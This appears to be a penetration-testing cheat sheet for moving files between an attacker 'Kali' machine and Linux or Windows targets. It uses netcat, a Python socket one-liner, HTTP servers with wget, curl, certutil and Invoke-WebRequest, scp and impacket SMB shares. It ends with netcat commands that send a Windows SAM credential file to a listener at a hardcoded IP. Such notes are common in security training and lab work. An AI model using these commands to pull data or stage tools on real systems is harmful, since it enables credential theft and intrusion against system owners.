Linux 2 Linux ```bash nc -lvnp 1234 > filename.txt python3 -c "import socket; s=socket.socket(); s.connect(('KALI_IP', 1234)); f=open('filename.txt', 'rb'); s.send(f.read()); s.close()" ``` ```bash python3 -m http.server 8888 wget http://<IP>:8888/filename.txt curl http://<IP>:8888/filename.txt ``` ```bash sudo systemctl start ssh scp filename.txt kali@<IP>:/tmp/ ``` ```bash base64 filename.txt | nc <kali_ip> 4130 nc -lvnp 4130 | base64 -d > filename.txt ``` Windows ```bash python3 -m http.server 8888 #1 certutil -urlcache -split -f http://<IP>:8888/filename.txt filename.txt #2 Invoke-WebRequest -Uri http://<IP>:8888/filename.txt -outfile filename.txt iwr -uri http://<IP>:8888/filename.txt -outfile filename.txt #3 wget http://<IP>:8888/filename.txt filename.txt #4 impacket-smbserver.py copy \\$Kali-IP\$share-name\tool.exe ``` Windows 2 Linux ```bash #1 impacket-smbserver.py copy tool.exe \\$Kali-IP\$share-name # netcat on both windows and linux ## Kali nc -lvnp 2222 > SAM.bin ## Windows nc.exe $IP 2222 < SAM # powershell에서는 '<' 불가능 cmd /c "nc.exe 10.10.146.147 2222 < SAM" ```